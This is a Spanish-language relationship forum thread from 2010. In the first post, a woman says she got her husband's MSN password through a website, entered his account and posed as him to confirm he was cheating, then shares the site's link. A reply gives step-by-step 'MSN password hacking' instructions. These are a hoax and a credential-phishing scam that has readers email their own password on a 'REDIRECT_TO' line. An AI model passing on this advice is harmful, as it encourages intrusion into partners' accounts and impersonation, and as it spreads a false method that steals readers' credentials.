Foro / Pareja

Quereis saber si les es infiel???? lean yo lo hice y se cual es su ex amante

Última respuesta: 19 de abril de 2010 a las 18:45
H
hope_7342201
16/4/10 a las 14:43

hola a todos mi marido me fue infiel y lo supe , porque una amiiga me dijo que averiguace su contraseña del msn y que vea ahi cual es esa otra. Yo no tenia ni idea de la contraseña asi k me dio una pagina y ahi la averigue , al principio no sabia si eso funcionaba asi que probe con mi propia contraseña y la de ella( mi amiga) y era verdad luego prove con la de mi marido la consegui, cuando entre a su msn vi un monton de chicas, agregadas algunas las conocia , pero a otras no, entre esas direcciones estaba la de la ex novia , asi que me ice pasar por el y le envie un correo instantaneo , diciendole que a cierta hora me conectaba y que deseaba hablar con ella, asi ke a esa cierta ora nos conectamos las dos y yo me ize pasar por él, y descubri k me engañaba con ella... Yo se que ice mal pero no habia otra manera de saber si me era infiel.


Si pensais que habla con una amante por el msn o que os poone los cuernos por msn . Pues averiguar la contraseña:

Os dejo la paggina por si algun@ lo kiere saber.

http://www.lanzadorx.com/?r=155290

Ver también

X
xi_9439941
19/4/10 a las 18:45

Como hackear passwords de msn messenger
COMO HACKEAR PASSWORDS DE MSN MESSENGER:

El método utilizado por http://www.hotmail.com para dar una contraseña perdida es utilizar el asistente de su web pero lo que realmente hace es acceder a un 'boot' que lo único que hace es enviar un email al correo de contacto de la persona que se lo ha olvidado asegurando así la privacidad. Pero lo que no todo el mundo sabe es que este proceso (normalmente realizado desde la web) no es mas que un envío a...
to-recovermy-password@hotmail. com con un formato preestablecido.

Todo consiste en enviar un email...

PASO 1:

En el campo para, escribiremos:

to-recovermy-password@hotmail. com

PASO 2:

En el campo Asunto, escribiremos:

PassRecovery-mail-MSN

PASO 3:

EN LA PRIMERA LINEA (IMPORTANTE QUE SEA LA PRIMERA LINEA DEL CUERPO
DEL MENSAJE) Escribiremos lo siguiente:

USR_RCVR: email de la victima@hotmail.com

PASO 4:

EN LA CUARTA LINEA HAS DE PONER LO SIGUIENTE (recuerda la CUARTA LINEA) :

REDIRECT_TO: tu email@hotmail.com:tucontraseña


* LA SEGUNDA Y TERCERA LINEA DEBEN SER SIMPLES INTROS (o sea en blanco)


****************************** ****************************** ****************************** ***********************

Una explicación a todo esto es la siguiente. Al mandar un email al boot desde la web oficial los mensajes de reenvío de password tienen un formato preestablecido por lo que al cambiarlo se le va un poco... el campo REDIRECT_TO lo que hace es redireccionar la salida del mensaje iniciando sesión en nuestra cuenta enviando la contraseña de la victima a nuestro buzón de correo.

Ultimas conversaciones
ISDIN Si-Nails

ISDIN Si-Nails

Compartir
#instapic #picoftheday #Fashion #Beauty #Fitness #Deco
instagram